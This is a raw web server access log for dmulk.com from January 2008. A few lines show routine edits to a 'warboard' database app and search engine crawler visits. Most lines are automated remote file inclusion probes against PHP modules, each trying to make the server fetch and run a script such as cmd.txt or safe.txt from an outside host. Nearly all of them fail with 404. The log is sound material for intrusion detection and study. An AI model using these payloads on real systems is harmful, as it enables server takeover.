68.8.232.250 - warboard [26/Jan/2008:10:13:02 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=4844 HTTP/1.1" 200 7615 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&just_inserted=1&order=dataid&order_type=desc" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [26/Jan/2008:10:13:09 -0800] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=4844 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=4844" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [26/Jan/2008:10:13:09 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=4844&just_updated=1 HTTP/1.1" 200 7527 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=4844" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [26/Jan/2008:10:13:12 -0800] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=4844&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [26/Jan/2008:10:13:18 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [26/Jan/2008:10:13:21 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33138 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [26/Jan/2008:10:13:30 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=575 HTTP/1.1" 200 7625 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [26/Jan/2008:10:13:36 -0800] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=575 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=575" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [26/Jan/2008:10:13:36 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=575&just_updated=1 HTTP/1.1" 200 7652 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=575" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [26/Jan/2008:10:13:40 -0800] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=575&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [26/Jan/2008:10:13:42 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [26/Jan/2008:10:13:43 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33133 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
205.234.228.74 - - [26/Jan/2008:10:15:54 -0800] "GET /logs/access_071229.log/lib/gore.php?libpath=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.228.74 - - [26/Jan/2008:10:15:54 -0800] "GET /lib/gore.php?libpath=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.228.74 - - [26/Jan/2008:10:15:54 -0800] "GET /logs/lib/gore.php?libpath=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:10:18:11 -0800] "GET /logs/index1.php?choix=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:10:18:12 -0800] "GET /index1.php?choix=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
194.88.212.212 - - [26/Jan/2008:10:18:13 -0800] "GET /logs/index1.php?choix=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
194.88.212.212 - - [26/Jan/2008:10:18:13 -0800] "GET /index1.php?choix=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
212.227.101.9 - - [26/Jan/2008:10:18:54 -0800] "GET /logs/access_071230.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/new.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.9 - - [26/Jan/2008:10:18:54 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/new.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.9 - - [26/Jan/2008:10:18:55 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/new.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.11.119.180 - - [26/Jan/2008:10:19:04 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.119.180 - - [26/Jan/2008:10:19:04 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.101.9 - - [26/Jan/2008:10:19:41 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/new.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.9 - - [26/Jan/2008:10:19:42 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/new.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.9 - - [26/Jan/2008:10:19:42 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://munhag.com/kimgyeongho/count/data/data/new.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.91.99.14 - - [26/Jan/2008:10:20:09 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.geocities.com/nenk_aja2000/lovely.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.142.34 - - [26/Jan/2008:10:21:23 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.142.34 - - [26/Jan/2008:10:21:24 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.142.34 - - [26/Jan/2008:10:21:24 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.35.237.170 - - [26/Jan/2008:10:23:14 -0800] "GET /logs/access_080106.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/bujankgilo/SAntcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.35.237.170 - - [26/Jan/2008:10:23:14 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/bujankgilo/SAntcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.35.237.170 - - [26/Jan/2008:10:23:21 -0800] "GET /logs/access_080106.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/bujankgilo/SAntcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.35.237.170 - - [26/Jan/2008:10:23:21 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/bujankgilo/SAntcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.35.237.170 - - [26/Jan/2008:10:23:28 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/bujankgilo/SAntcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.142.34 - - [26/Jan/2008:10:23:38 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:10:24:03 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:10:24:03 -0800] "GET //skin/zero_vote/error.php?dir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:10:24:04 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.201.178 - - [26/Jan/2008:10:24:51 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://autismsocietysa.org/Owl/Documents/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.202.246 - - [26/Jan/2008:10:25:24 -0800] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.codinus.com/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.142.34 - - [26/Jan/2008:10:25:40 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:10:25:51 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.103.8.225 - - [26/Jan/2008:10:27:37 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.103.8.225 - - [26/Jan/2008:10:27:43 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.103.8.225 - - [26/Jan/2008:10:27:48 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.123.238.8 - - [26/Jan/2008:10:28:02 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)" "www.dmulk.com"
63.123.238.8 - - [26/Jan/2008:10:28:02 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)" "www.dmulk.com"
218.103.8.225 - - [26/Jan/2008:10:28:35 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.88.212.212 - - [26/Jan/2008:10:29:00 -0800] "GET /logs//sources/functions.php?CONFIG[main_path]=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
194.88.212.212 - - [26/Jan/2008:10:29:00 -0800] "GET //sources/functions.php?CONFIG[main_path]=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
203.130.202.246 - - [26/Jan/2008:10:29:47 -0800] "GET /logs/access_080106.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.codinus.com/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.202.246 - - [26/Jan/2008:10:29:47 -0800] "GET /logs/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.codinus.com/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.68.186 - - [26/Jan/2008:10:30:48 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:10:31:50 -0800] "GET //sources/functions.php?CONFIG[main_path]=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:10:31:51 -0800] "GET /logs//sources/functions.php?CONFIG[main_path]=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
218.103.8.225 - - [26/Jan/2008:10:32:08 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.pcbcservice.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.68.186 - - [26/Jan/2008:10:32:11 -0800] "GET /logs/access.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.68.186 - - [26/Jan/2008:10:32:11 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.68.186 - - [26/Jan/2008:10:32:12 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.68.186 - - [26/Jan/2008:10:32:51 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.68.186 - - [26/Jan/2008:10:32:51 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.68.186 - - [26/Jan/2008:10:33:11 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.130.202.246 - - [26/Jan/2008:10:33:22 -0800] "GET /logs/access_071229.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.codinus.com/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
148.223.96.2 - - [26/Jan/2008:10:33:49 -0800] "GET /logs//sources/functions.php?CONFIG[main_path]=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
148.223.96.2 - - [26/Jan/2008:10:33:49 -0800] "GET //sources/functions.php?CONFIG[main_path]=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
209.216.249.151 - - [26/Jan/2008:10:35:13 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.216.249.151 - - [26/Jan/2008:10:35:13 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.27.108 - - [26/Jan/2008:10:35:50 -0800] "GET /logs/?S=A HTTP/1.0" 200 31810 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:10:35:52 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:10:35:53 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:10:35:53 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.165.116 - - [26/Jan/2008:10:37:26 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [26/Jan/2008:10:37:26 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [26/Jan/2008:10:37:26 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:10:37:39 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:10:37:40 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:10:37:40 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.165.116 - - [26/Jan/2008:10:37:41 -0800] "GET /logs/access_080106.log//modules/TotalCalendar/about.php?inc_dir=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.32.201.178 - - [26/Jan/2008:10:38:06 -0800] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://autismsocietysa.org/Owl/Documents/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.201.178 - - [26/Jan/2008:10:38:06 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://autismsocietysa.org/Owl/Documents/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:10:40:52 -0800] "GET /logs/access_071228.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:10:40:53 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:10:40:53 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:10:42:16 -0800] "GET /logs/access_071231.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.156.153 - - [26/Jan/2008:10:43:37 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
72.55.156.153 - - [26/Jan/2008:10:43:38 -0800] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.52.230.10 - - [26/Jan/2008:10:44:29 -0800] "GET /?mosConfig_absolute_path=http://www.p-l.nl/cache/sistem.txt?? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
80.84.251.66 - - [26/Jan/2008:10:44:33 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.165.116 - - [26/Jan/2008:10:47:00 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [26/Jan/2008:10:47:00 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.152.128.23 - - [26/Jan/2008:10:49:23 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)" "www.dmulk.com"
140.113.4.81 - - [26/Jan/2008:10:49:25 -0800] "GET /logs/access_080106.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.84.251.66 - - [26/Jan/2008:10:49:37 -0800] "GET /logs/access_080106.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.84.251.66 - - [26/Jan/2008:10:49:37 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.84.251.66 - - [26/Jan/2008:10:49:37 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.218.97.19 - - [26/Jan/2008:10:49:50 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://yourdomain.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
